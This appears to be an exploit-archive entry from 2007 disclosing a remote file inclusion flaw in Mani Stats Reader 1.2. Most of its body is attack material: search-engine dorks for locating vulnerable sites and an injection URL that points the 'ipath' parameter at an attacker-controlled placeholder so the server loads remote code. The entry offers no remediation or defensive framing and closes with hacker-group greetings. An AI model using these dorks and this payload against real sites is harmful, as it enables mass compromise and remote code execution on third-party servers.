id: 1548
date: 03/02/2007
title: Mani Stats Reader <= 1.2 (ipath) Remote File Include Vulnerability
author: mozi
cves: 

==================================================================
Mani Stats Reader <= 1.2 (ipath) Remote File Include Vulnerability
==================================================================



Mani Admin Plugin Stats Reader V1.2 rfi :) 

dork:"2006 by www.mani-stats-reader.de.vu"
     "allinurl:.php?ipath=  inurl:"css""

vuln:index.php?ipath=evilshit

greetz:RST, LinuxPakistan phpfreaks 



#  0day.today [2023-03-24]  #